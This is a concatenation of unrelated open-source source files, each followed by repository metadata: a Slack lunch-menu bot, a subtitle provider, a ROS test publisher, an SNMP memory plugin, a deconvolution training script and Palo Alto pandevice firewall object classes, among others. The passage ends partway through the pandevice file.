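#         msg: "{{ lookup('etcd', 'foo/bar', validate_certs=False) }}"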
|
krishnazure/ansible
|
lib/ansible/plugins/lookup/etcd.py
|
Python
|
gpl-3.0
| 2,396
|
#!/usr/bin/env python3
import asyncio
import os
from datetime import datetime
import aiohttp
from aiohttp import web
from raven import Client
from restaurants import (FormattedMenus, SafeRestaurant, OtherRestaurant,
AvalonRestaurant, TOTORestaurant, TOTOCantinaRestaurant,
CasaInkaRestaurant, OlivaRestaurant, CityCantinaRosumRestaurant)
from slack import Channel
# SLACK_HOOK = 'https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX'
SLACK_HOOK = os.environ.get('SLACK_HOOK', None)
SLACK_CHANNEL = os.environ.get('SLACK_CHANNEL', None)
SECRET_KEY = os.environ.get('SECRET_KEY', None)
DEBUG = bool(os.environ.get('DEBUG', False))
def is_work_day():
return datetime.today().weekday() in range(0, 5)
def should_send_to_slack(secret_key):
return SLACK_HOOK and secret_key == SECRET_KEY
async def retrieve_menus(session):
futures = [
SafeRestaurant(TOTORestaurant(session)).retrieve_menu(),
SafeRestaurant(TOTOCantinaRestaurant(session)).retrieve_menu(),
SafeRestaurant(AvalonRestaurant(session)).retrieve_menu(),
SafeRestaurant(OlivaRestaurant(session)).retrieve_menu(),
SafeRestaurant(CasaInkaRestaurant(session)).retrieve_menu(),
SafeRestaurant(CityCantinaRosumRestaurant(session)).retrieve_menu(),
]
# Add list of other restaurants first, will be in header.
menus = [await SafeRestaurant(OtherRestaurant()).retrieve_menu()]
for future in asyncio.as_completed(futures):
menus.append(await future)
return menus
async def index(request):
if is_work_day():
async with aiohttp.ClientSession() as session:
menus = FormattedMenus(await retrieve_menus(session))
secret_key = request.match_info.get('secret_key')
if should_send_to_slack(secret_key):
await Channel(SLACK_HOOK, session).send(menus)
return web.Response(text=str(menus))
return web.Response(text='Come on Monday-Friday')
sentry_client = Client()  # credentials are taken from the environment variable SENTRY_DSN
app = web.Application(debug=True)
app.router.add_get('/', index)
app.router.add_get('/{secret_key}', index)
if __name__ == '__main__':
web.run_app(app, host='localhost', port=5000)
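# Hedged usage sketch (not part of the original file): with SLACK_HOOK and
# SECRET_KEY exported, the menus can be fetched locally via
#   curl http://localhost:5000/
# and additionally pushed to Slack when the matching secret is used:
#   curl http://localhost:5000/<SECRET_KEY>
# Host and port follow the web.run_app() call above.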
|
fadawar/infinit-lunch
|
main.py
|
Python
|
gpl-3.0
| 2,316
|
# -*- coding: utf-8 -*-
import io
import logging
import re
from babelfish import Language, language_converters
from guessit import guessit
try:
from lxml import etree
except ImportError:
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
from requests import Session
from zipfile import ZipFile
from . import Provider
from .. import __short_version__
from ..exceptions import ProviderError
from ..subtitle import Subtitle, fix_line_ending, guess_matches
from ..video import Episode, Movie, sanitize
logger = logging.getLogger(__name__)
class PodnapisiSubtitle(Subtitle):
provider_name = 'podnapisi'
def __init__(self, language, hearing_impaired, page_link, pid, releases, title, season=None, episode=None,
year=None):
super(PodnapisiSubtitle, self).__init__(language, hearing_impaired, page_link)
self.pid = pid
self.releases = releases
self.title = title
self.season = season
self.episode = episode
self.year = year
@property
def id(self):
return self.pid
def get_matches(self, video):
matches = set()
# episode
if isinstance(video, Episode):
# series
if video.series and sanitize(self.title) == sanitize(video.series):
matches.add('series')
# year
if video.original_series and self.year is None or video.year and video.year == self.year:
matches.add('year')
# season
if video.season and self.season == video.season:
matches.add('season')
# episode
if video.episode and self.episode == video.episode:
matches.add('episode')
# guess
for release in self.releases:
matches |= guess_matches(video, guessit(release, {'type': 'episode'}))
# movie
elif isinstance(video, Movie):
# title
if video.title and sanitize(self.title) == sanitize(video.title):
matches.add('title')
# year
if video.year and self.year == video.year:
matches.add('year')
# guess
for release in self.releases:
matches |= guess_matches(video, guessit(release, {'type': 'movie'}))
return matches
class PodnapisiProvider(Provider):
languages = ({Language('por', 'BR'), Language('srp', script='Latn')} |
{Language.fromalpha2(l) for l in language_converters['alpha2'].codes})
server_url = 'http://podnapisi.eu/subtitles/'
def initialize(self):
self.session = Session()
self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__
def terminate(self):
self.session.close()
def query(self, language, keyword, season=None, episode=None, year=None):
# set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652
params = {'sXML': 1, 'sL': str(language), 'sK': keyword}
is_episode = False
if season and episode:
is_episode = True
params['sTS'] = season
params['sTE'] = episode
if year:
params['sY'] = year
# loop over paginated results
logger.info('Searching subtitles %r', params)
subtitles = []
pids = set()
while True:
# query the server
xml = etree.fromstring(self.session.get(self.server_url + 'search/old', params=params, timeout=10).content)
# exit if no results
if not int(xml.find('pagination/results').text):
logger.debug('No subtitles found')
break
# loop over subtitles
for subtitle_xml in xml.findall('subtitle'):
# read xml elements
language = Language.fromietf(subtitle_xml.find('language').text)
hearing_impaired = 'n' in (subtitle_xml.find('flags').text or '')
page_link = subtitle_xml.find('url').text
pid = subtitle_xml.find('pid').text
releases = []
if subtitle_xml.find('release').text:
for release in subtitle_xml.find('release').text.split():
release = re.sub(r'\.+$', '', release) # remove trailing dots
release = ''.join(filter(lambda x: ord(x) < 128, release)) # remove non-ascii characters
releases.append(release)
title = subtitle_xml.find('title').text
season = int(subtitle_xml.find('tvSeason').text)
episode = int(subtitle_xml.find('tvEpisode').text)
year = int(subtitle_xml.find('year').text)
if is_episode:
subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title,
season=season, episode=episode, year=year)
else:
subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title,
year=year)
# ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321
if pid in pids:
continue
logger.debug('Found subtitle %r', subtitle)
subtitles.append(subtitle)
pids.add(pid)
# stop on last page
if int(xml.find('pagination/current').text) >= int(xml.find('pagination/count').text):
break
# increment current page
params['page'] = int(xml.find('pagination/current').text) + 1
logger.debug('Getting page %d', params['page'])
return subtitles
def list_subtitles(self, video, languages):
if isinstance(video, Episode):
return [s for l in languages for s in self.query(l, video.series, season=video.season,
episode=video.episode, year=video.year)]
elif isinstance(video, Movie):
return [s for l in languages for s in self.query(l, video.title, year=video.year)]
def download_subtitle(self, subtitle):
# download as a zip
logger.info('Downloading subtitle %r', subtitle)
r = self.session.get(self.server_url + subtitle.pid + '/download', params={'container': 'zip'}, timeout=10)
r.raise_for_status()
# open the zip
with ZipFile(io.BytesIO(r.content)) as zf:
if len(zf.namelist()) > 1:
raise ProviderError('More than one file to unzip')
subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
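# Hedged usage sketch (not part of the original file): a minimal, standalone way
# to exercise this provider outside the subliminal core might look like
#   provider = PodnapisiProvider()
#   provider.initialize()
#   try:
#       subs = provider.query(Language('eng'), 'Big Buck Bunny', year=2008)
#   finally:
#       provider.terminate()
# The title and year are illustrative; subliminal normally drives providers
# through list_subtitles()/download_subtitle() instead.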
|
pedro2d10/SickRage-FR
|
lib/subliminal/providers/podnapisi.py
|
Python
|
gpl-3.0
| 6,891
|
from . import recipeMergerPlugin
plugins = [
recipeMergerPlugin.RecipeMergerPlugin,
recipeMergerPlugin.RecipeMergerImportManagerPlugin
]
|
kirienko/gourmet
|
src/gourmet/plugins/duplicate_finder/__init__.py
|
Python
|
gpl-2.0
| 150
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-24 21:48
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
jojoriveraa/titulacion-NFCOW
|
NFCow/users/migrations/0002_auto_20151224_2148.py
|
Python
|
apache-2.0
| 487
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VaultSecretGroup(Model):
"""Describes a set of certificates which are all in the same Key Vault.
:param source_vault: The Relative URL of the Key Vault containing all of
the certificates in VaultCertificates.
:type source_vault: :class:`SubResource
<azure.mgmt.compute.compute.v2015_06_15.models.SubResource>`
:param vault_certificates: The list of key vault references in SourceVault
which contain certificates.
:type vault_certificates: list of :class:`VaultCertificate
<azure.mgmt.compute.compute.v2015_06_15.models.VaultCertificate>`
"""
_attribute_map = {
'source_vault': {'key': 'sourceVault', 'type': 'SubResource'},
'vault_certificates': {'key': 'vaultCertificates', 'type': '[VaultCertificate]'},
}
def __init__(self, source_vault=None, vault_certificates=None):
self.source_vault = source_vault
self.vault_certificates = vault_certificates
|
SUSE/azure-sdk-for-python
|
azure-mgmt-compute/azure/mgmt/compute/compute/v2015_06_15/models/vault_secret_group.py
|
Python
|
mit
| 1,462
|
#!/usr/bin/env python
import rospy
import math
import random
from std_msgs.msg import String
import sys
import array
pub = None
# not truly implemented yet.
# def floored_abs():
# counter = 1
# step_size = 5000
# maximum = 20000
# distance = maximum - counter
# duration = rospy.get_param("~duration", 10)
# time_step = distance / duration
# direction = 1
# while not rospy.is_shutdown():
# c = math.floor(counter / step_size) + 1
# counter += direction * time_step
# if counter >= maximum:
# direction = -1
# if direction < 0 and counter == 1:
# direction = 1
# c *= 1000
# print(c)
# pub.publish(
# ("%s times, " % int(c)) + "publishing with floored_abs. " * int(c))
# rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
# def linear_abs():
# counter = 1
# maximum = 20000
# distance = maximum - counter
# duration = rospy.get_param("~duration", 10)
# time_step = distance / duration
# direction = 1
# while not rospy.is_shutdown():
# counter += direction * time_step
# print(counter)
# if counter >= maximum:
# direction = -1
# if direction < 0 and counter == 1:
# direction = 1
# pub.publish(("%s times, " % int(math.floor(counter))) +
# "publishing with linear_abs. " * int(math.floor(counter)))
# rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
# def sawtooth():
# high = rospy.get_param("~bandwidth_high", 200)
# low = rospy.get_param("~bandwidth_low", 1)
# distance = high - low
# steps = rospy.get_param("~steps", distance)
# step = distance / steps
# counter = 1
# while not rospy.is_shutdown():
# pub.publish("publishing with sawtooth. " * int(counter))
# counter += step
# if counter >= high:
# counter = 1
# rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
def sine():
frequency = rospy.get_param("~frequency", 10)
rate = rospy.Rate(frequency)
mid = rospy.get_param("~bandwidth_mid", 1024) / frequency
var = rospy.get_param("~bandwidth_variation", 500) / frequency
    # period of the sine wave, in seconds
period = rospy.get_param("~period", 30)
begin = rospy.Time.now()
while not rospy.is_shutdown():
cur = rospy.Time.now() - begin
fluctuation = math.sin(2 * math.pi / period * cur.to_sec()) * var
msgsize = mid + fluctuation
pub.publish("." * int(msgsize))
rate.sleep()
def constant():
frequency = rospy.get_param("~frequency", 1000)
rate = rospy.Rate(frequency)
bandwidth = rospy.get_param("~bandwidth", 1024 * 1024)
msg = "." * (bandwidth / frequency)
while not rospy.is_shutdown():
pub.publish(msg)
rate.sleep()
def high_low():
frequency = rospy.get_param("~frequency", 10)
rate = rospy.Rate(frequency)
bandwidth_high = rospy.get_param("~bandwidth_high", 1024 * 1024)
bandwidth_low = rospy.get_param("~bandwidth_low", 1024)
# in seconds
change_interval = rospy.Duration(rospy.get_param("~period", 30) / 2)
msg = list()
msg.append("." * (bandwidth_low / frequency))
msg.append("." * (bandwidth_high / frequency))
current = 0
last_change = rospy.Time.now()
while not rospy.is_shutdown():
if(rospy.Time.now() - last_change > change_interval):
last_change = rospy.Time.now()
current = not current
print current
pub.publish(msg[current])
rate.sleep()
def stop_publish():
start = rospy.Time.now()
while not rospy.is_shutdown() and rospy.Time.now() - start < rospy.Duration(rospy.get_param("~timeout", 30)):
pub.publish(
"publishing until it stops. " * int(random.randrange(100, 150)))
rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
def freq_high_low():
sleep_time_high = rospy.Duration(1.0 / rospy.get_param("~frequency_high", 200))
sleep_time_low = rospy.Duration(1.0 / rospy.get_param("~frequency_low", 10))
# in seconds
change_interval = rospy.Duration(rospy.get_param("~period", 10) / 2)
sleep_time = list()
sleep_time.append(sleep_time_high)
sleep_time.append(sleep_time_low)
current = 0
msg = "." * 100
last_change = rospy.Time.now()
while not rospy.is_shutdown():
calc_time = rospy.Time.now()
if(rospy.Time.now() - last_change > change_interval):
last_change = rospy.Time.now()
current = not current
pub.publish(msg)
calc_time = rospy.Time.now() - calc_time
rospy.sleep(sleep_time[current] - calc_time)
def freq_high_low_once():
sleep_time_high = rospy.Duration(1.0 / rospy.get_param("~frequency_high", 200))
sleep_time_low = rospy.Duration(1.0 / rospy.get_param("~frequency_low", 10))
# in seconds
change_interval = rospy.Duration(rospy.get_param("~switch_after", 30))
sleep_time = list()
sleep_time.append(sleep_time_high)
sleep_time.append(sleep_time_low)
current = 0
msg = "." * 100
last_change = rospy.Time.now()
while not rospy.is_shutdown():
calc_time = rospy.Time.now()
if(rospy.Time.now() - last_change > change_interval) and (current == 0):
last_change = rospy.Time.now()
current = not current
pub.publish(msg)
calc_time = rospy.Time.now() - calc_time
rospy.sleep(sleep_time[current] - calc_time)
def freq_sine():
mid = rospy.get_param("~frequency_mid", 100)
var = rospy.get_param("~frequency_variation", 20)
    # period of the frequency sine wave, in seconds
period = rospy.get_param("~period", 30)
begin = rospy.Time.now()
msg = "." * 100
while not rospy.is_shutdown():
calc_time = rospy.Time.now()
cur = rospy.Time.now() - begin
fluctuation = math.sin(2 * math.pi * cur.to_sec() / period ) * var
# rospy.logwarn("fluc is %f"%fluctuation)
frequency = mid + fluctuation
pub.publish(msg)
calc_time = rospy.Time.now() - calc_time
# rospy.logwarn("calc time is %f"%calc_time.to_sec())
# rospy.logwarn("should sleep %f", 1 / frequency)
rospy.sleep(rospy.Duration(1/frequency) - calc_time)
'''
~mode = ("constant", "stop_publish", "sine", "high_low", "freq_high_low", "freq_sine", "freq_high_low_once")  # sawtooth, floored_abs and linear_abs are currently commented out
~frequency = 10
stop_publish:
# stops random publishing after timeout seconds
~timeout = 30
sawtooth:
# publishes more and more data then resets to bandwidth_low
~bandwidth_high = 200
~bandwidth_low = 1
~steps = bandwidth_high - bandwidth_low # steps to go from low to high
sine:
# publishes data in a sinus curve
~bandwidth_mid = 100
~bandwidth_variation = 5000 # sinus' amplitude
floored_abs:
# publishes a floor(abs(x))-shape
linear_abs:
# publishes a abs(x)-shape
'''
if __name__ == '__main__':
rospy.init_node('node_name', log_level=rospy.DEBUG)
pub = rospy.Publisher(
rospy.get_param('~topic_name', 'topic_name'), String, queue_size=10)
modes = {
'constant': constant,
'stop_publish': stop_publish,
# 'sawtooth': sawtooth,
'sine': sine,
'high_low': high_low,
'freq_high_low': freq_high_low,
'freq_sine': freq_sine,
'freq_high_low_once': freq_high_low_once}
mode = rospy.get_param("~mode", "freq_high_low_once")
if mode in modes:
modes[mode]()
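# Hedged usage sketch (not part of the original file): the node is normally
# started with rosrun and tuned through private parameters, e.g.
#   rosrun arni_core predefined_publisher.py _mode:=sine _frequency:=10 _topic_name:=chatter
# The package name is inferred from this repository layout and is an
# assumption; available ~mode values are those in the modes dict above.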
|
andreasBihlmaier/arni
|
arni_core/test/predefined_publisher.py
|
Python
|
bsd-2-clause
| 7,498
|
"""
Ecks plugin to collect system memory usage information
Copyright 2011 Chris Read (chris.read@gmail.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
def get_memory(parent, host, community):
""" This is a plugin to be loaded by Ecks
    Returns a tuple containing (total_swap, avail_swap, total_real, avail_real, mem_buffer, mem_cached). Values are in kilobytes.
"""
memory = (1,3,6,1,4,1,2021,4) # UCD-SNMP-MIB
data = parent.get_snmp_data(host, community, memory, 1)
if data:
return map(parent._build_answer,
parent._extract(data, int, 3),
parent._extract(data, int, 4),
parent._extract(data, int, 5),
parent._extract(data, int, 6),
parent._extract(data, int, 14),
parent._extract(data, int, 15),
)[0]
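# Hedged usage sketch (not part of the original file): this module is loaded as
# an Ecks plugin, which passes the Ecks instance in as `parent`; a call is
# assumed to be dispatched roughly as
#   e = Ecks()
#   total_swap, avail_swap, total_real, avail_real, buf, cached = \
#       e.get_data('127.0.0.1', 'public', 'memory')
# The get_data() entry point, host and community string are assumptions based
# on how Ecks exposes its get_* plugins.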
|
cread/ecks
|
ecks/plugins/memory.py
|
Python
|
apache-2.0
| 1,335
|
import sys
import os
import numpy as np
import lasagne as nn
import theano
import theano.tensor as T
from PIL import Image
import utils as u
import models as m
import config as c
# 01/03/2016
# Trains a convnet for going from the conv features back to images
# because just using the bottom of the autoencoder doesn't work if
# splitting on any layer other than 'encode'
def main(data_file='', img_size = 64, num_epochs = 10, batch_size = 128,
pxsh = 0.5, split_layer = 'conv7', specstr=c.pf_cae_specstr,
cae_params=c.pf_cae_params, save_to='params'):
# transform function to go from images -> conv feats
conv_feats,_ = m.encoder_decoder(cae_params, specstr=specstr,
layersplit=split_layer, shape=(img_size,img_size))
# build pretrained net for images -> convfeats in order to get the input shape
# for the reverse function
print('compiling functions')
conv_net = m.build_cae(input_var=None, specstr=specstr, shape=(img_size,img_size))
cae_layer_dict = dict((l.name, l) for l in nn.layers.get_all_layers(conv_net))
shape = nn.layers.get_output_shape(cae_layer_dict[split_layer])
# build net for convfeats -> images
imgs_var = T.tensor4('images')
convs_var = T.tensor4('conv_features')
deconv_net = m.build_deconv_net(input_var=convs_var, shape=shape, specstr=specstr)
loss = nn.objectives.squared_error(imgs_var, nn.layers.get_output(deconv_net)).mean()
te_loss = nn.objectives.squared_error(imgs_var, nn.layers.get_output(deconv_net,
deterministic=True)).mean()
params = nn.layers.get_all_params(deconv_net, trainable=True)
lr = theano.shared(nn.utils.floatX(3e-3))
updates = nn.updates.adam(loss, params, learning_rate=lr)
# compile functions
train_fn = theano.function([convs_var, imgs_var], loss, updates=updates)
val_fn = theano.function([convs_var, imgs_var], te_loss)
deconv_fn = theano.function([convs_var], nn.layers.get_output(deconv_net,
deterministic=True))
# run training loop
print("training for {} epochs".format(num_epochs))
def data_transform(x, do_center):
floatx_ims = u.raw_to_floatX(x, pixel_shift=pxsh, square=True, center=do_center)
return (conv_feats(floatx_ims), floatx_ims)
data = u.DataH5PyStreamer(data_file, batch_size=batch_size)
hist = u.train_with_hdf5(data, num_epochs=num_epochs, train_fn=train_fn, test_fn=val_fn,
tr_transform=lambda x: data_transform(x[0], do_center=False),
te_transform=lambda x: data_transform(x[0], do_center=True))
# generate examples, save training history and params
te_stream = data.streamer(shuffled=True)
imb, = next(te_stream.get_epoch_iterator())
imb = data_transform(imb, True)[0]
result = deconv_fn(imb)
for i in range(result.shape[0]):
Image.fromarray(u.get_picture_array(result, index=i, shift=pxsh)) \
.save('output_{}.jpg'.format(i))
hist = np.asarray(hist)
np.savetxt('deconv_train_hist.csv', np.asarray(hist), delimiter=',', fmt='%.5f')
u.save_params(deconv_net, os.path.join(save_to, 'deconv_{}.npz'.format(hist[-1,-1])))
if __name__ == '__main__':
# make all arguments of main(...) command line arguments (with type inferred from
# the default value) - this doesn't work on bools so those are strings when
# passed into main.
import argparse, inspect
parser = argparse.ArgumentParser(description='Command line options')
ma = inspect.getargspec(main)
for arg_name,arg_type in zip(ma.args[-len(ma.defaults):],[type(de) for de in ma.defaults]):
parser.add_argument('--{}'.format(arg_name), type=arg_type, dest=arg_name)
args = parser.parse_args(sys.argv[1:])
main(**{k:v for (k,v) in vars(args).items() if v is not None})
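# Hedged usage sketch (not part of the original file): since every keyword
# argument of main() is turned into a command line flag above, a run might be
#   python train_deconv.py --data_file faces.h5 --num_epochs 10 --batch_size 64
# The HDF5 file name is illustrative; unspecified flags fall back to the
# defaults in main()'s signature.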
|
tencia/video_predict
|
train_deconv.py
|
Python
|
mit
| 3,819
|
from AutoNetkit.examples.examples import *
import AutoNetkit.examples.examples
|
sk2/ank_le
|
AutoNetkit/examples/__init__.py
|
Python
|
bsd-3-clause
| 80
|
#!/usr/bin/env python
# Copyright (c) 2014, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Objects module contains objects that exist in the 'Objects' tab in the firewall GUI"""
# import modules
import re
import logging
import xml.etree.ElementTree as ET
import pandevice
from pandevice import getlogger
from pandevice.base import PanObject, Root, MEMBER, ENTRY
from pandevice.base import VarPath as Var
from pandevice.base import VersionedPanObject
from pandevice.base import VersionedParamPath
# import other parts of this pandevice package
import pandevice.errors as err
logger = getlogger(__name__)
class AddressObject(VersionedPanObject):
"""Address Object
Args:
name (str): Name of the object
value (str): IP address or other value of the object
type (str): Type of address:
* ip-netmask (default)
* ip-range
* fqdn
description (str): Description of this object
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/address')
# params
params = []
params.append(VersionedParamPath(
'value', path='{type}'))
params.append(VersionedParamPath(
'type', default='ip-netmask',
values=['ip-netmask', 'ip-range', 'fqdn'], path='{type}'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class AddressGroup(VersionedPanObject):
"""Address Group
Args:
static_value (list): Values for a static address group
dynamic_value (str): Registered-ip tags for a dynamic address group
description (str): Description of this object
tag (list): Administrative tags (not to be confused with registered-ip tags)
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/address-group')
# params
params = []
params.append(VersionedParamPath(
'static_value', path='static', vartype='member'))
params.append(VersionedParamPath(
'dynamic_value', path='dynamic/filter'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class Tag(VersionedPanObject):
"""Administrative tag
Args:
name (str): Name of the tag
color (str): Color ID (eg. 'color1', 'color4', etc). You can
use :func:`~pandevice.objects.Tag.color_code` to generate the ID.
comments (str): Comments
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/tag')
# params
params = []
params.append(VersionedParamPath(
'color', path='color'))
params.append(VersionedParamPath(
'comments', path='comments'))
self._params = tuple(params)
@staticmethod
def color_code(color_name):
"""Returns the color code for a color
Args:
color_name (str): One of the following colors:
* red
* green
* blue
* yellow
* copper
* orange
* purple
* gray
* light green
* cyan
* light gray
* blue gray
* lime
* black
* gold
* brown
"""
colors = {
'red': 1,
'green': 2,
'blue': 3,
'yellow': 4,
'copper': 5,
'orange': 6,
'purple': 7,
'gray': 8,
'light green': 9,
'cyan': 10,
'light gray': 11,
'blue gray': 12,
'lime': 13,
'black': 14,
'gold': 15,
'brown': 16,
}
if color_name not in colors:
raise ValueError("Color '{0}' is not valid".format(color_name))
return "color"+str(colors[color_name])
class ServiceObject(VersionedPanObject):
"""Service Object
Args:
name (str): Name of the object
protocol (str): Protocol of the service, either tcp or udp
source_port (str): Source port of the protocol, if any
destination_port (str): Destination port of the service
description (str): Description of this object
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/service')
# params
params = []
params.append(VersionedParamPath(
'protocol', path='protocol/{protocol}',
values=['tcp', 'udp'], default='tcp'))
params.append(VersionedParamPath(
'source_port', path='protocol/{protocol}/source-port'))
params.append(VersionedParamPath(
'destination_port', path='protocol/{protocol}/port'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ServiceGroup(VersionedPanObject):
"""ServiceGroup Object
Args:
name (str): Name of the object
value (list): List of service values
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/service-group')
# params
params = []
params.append(VersionedParamPath(
'value', path='members', vartype='member'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationObject(VersionedPanObject):
"""Application Object
Args:
name (str): Name of the object
category (str): Application category
subcategory (str): Application subcategory
technology (str): Application technology
risk (int): Risk (1-5) of the application
default_type (str): Default identification type of the application
default_value (list): Values for the default type
        parent_app (str): Parent application that this app falls under
timeout (int): Default timeout
tcp_timeout (int): TCP timeout
udp_timeout (int): UDP timeout
tcp_half_closed_timeout (int): TCP half closed timeout
tcp_time_wait_timeout (int): TCP wait time timeout
        evasive_behavior (bool): Application is actively evasive
consume_big_bandwidth (bool): Application uses large bandwidth
used_by_malware (bool): Application is used by malware
able_to_transfer_file (bool): Application can do file transfers
has_known_vulnerability (bool): Application has known vulnerabilities
tunnel_other_application (bool):
tunnel_applications (list): List of tunneled applications
prone_to_misuse (bool):
pervasive_use (bool):
file_type_ident (bool):
virus_ident (bool):
data_ident (bool):
description (str): Description of this object
tag (list): Administrative tags
Please refer to https://applipedia.paloaltonetworks.com/ for more info on these params
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application')
# params
params = []
params.append(VersionedParamPath(
'category', path='category'))
params.append(VersionedParamPath(
'subcategory', path='subcategory'))
params.append(VersionedParamPath(
'technology', path='technology'))
params.append(VersionedParamPath(
'risk', path='risk', vartype='int'))
params.append(VersionedParamPath(
'default_type', path='default/{default_type}',
values=['port', 'ident-by-ip-protocol', 'ident-by-icmp-type', 'ident-by-icmp6-type']))
params.append(VersionedParamPath(
'default_port', path='default/{default_type}', vartype='member',
condition={'default_type': 'port'}))
params.append(VersionedParamPath(
'default_ip_protocol', path='default/{default_type}',
condition={'default_type': 'ident-by-ip-protocol'}))
params.append(VersionedParamPath(
'default_icmp_type', path='default/{default_type}/type', vartype='int',
condition={'default_type': ['ident-by-icmp-type', 'ident-by-icmp6-type']}))
params.append(VersionedParamPath(
'default_icmp_code', path='default/{default_type}/code', vartype='int',
condition={'default_type': ['ident-by-icmp-type', 'ident-by-icmp6-type']}))
params.append(VersionedParamPath(
'parent_app', path='parent-app'))
params.append(VersionedParamPath(
'timeout', path='timeout', vartype='int'))
params.append(VersionedParamPath(
'tcp_timeout', path='tcp-timeout', vartype='int'))
params.append(VersionedParamPath(
'udp_timeout', path='udp-timeout', vartype='int'))
params.append(VersionedParamPath(
'tcp_half_closed_timeout', path='tcp-half-closed-timeout', vartype='int'))
params.append(VersionedParamPath(
'tcp_time_wait_timeout', path='tcp-time-wait-timeout', vartype='int'))
params.append(VersionedParamPath(
'evasive_behavior', path='evasive-behavior', vartype='yesno'))
params.append(VersionedParamPath(
'consume_big_bandwidth', path='consume-big-bandwidth', vartype='yesno'))
params.append(VersionedParamPath(
'used_by_malware', path='used-by-malware', vartype='yesno'))
params.append(VersionedParamPath(
'able_to_transfer_file', path='able-to-transfer-file', vartype='yesno'))
params.append(VersionedParamPath(
'has_known_vulnerability', path='has-known-vulnerability', vartype='yesno'))
params.append(VersionedParamPath(
'tunnel_other_application', path='tunnel-other-application', vartype='yesno'))
params.append(VersionedParamPath(
'tunnel_applications', path='tunnel-applications', vartype='member'))
params.append(VersionedParamPath(
'prone_to_misuse', path='prone-to-misuse', vartype='yesno'))
params.append(VersionedParamPath(
'pervasive_use', path='pervasive-use', vartype='yesno'))
params.append(VersionedParamPath(
'file_type_ident', path='file-type-ident', vartype='yesno'))
params.append(VersionedParamPath(
'virus_ident', path='virus-ident', vartype='yesno'))
params.append(VersionedParamPath(
'data_ident', path='data-ident', vartype='yesno'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationGroup(VersionedPanObject):
"""ApplicationGroup Object
Args:
name (str): Name of the object
value (list): List of application values
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application-group')
# params
params = []
params.append(VersionedParamPath(
'value', path='members', vartype='member'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationFilter(VersionedPanObject):
"""ApplicationFilter Object
Args:
name (str): Name of the object
category (list): Application category
subcategory (list): Application subcategory
technology (list): Application technology
risk (list): Application risk
evasive (bool):
excessive_bandwidth_use (bool):
prone_to_misuse (bool):
is_saas (bool):
transfers_files (bool):
tunnels_other_apps (bool):
used_by_malware (bool):
has_known_vulnerabilities (bool):
pervasive (bool):
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
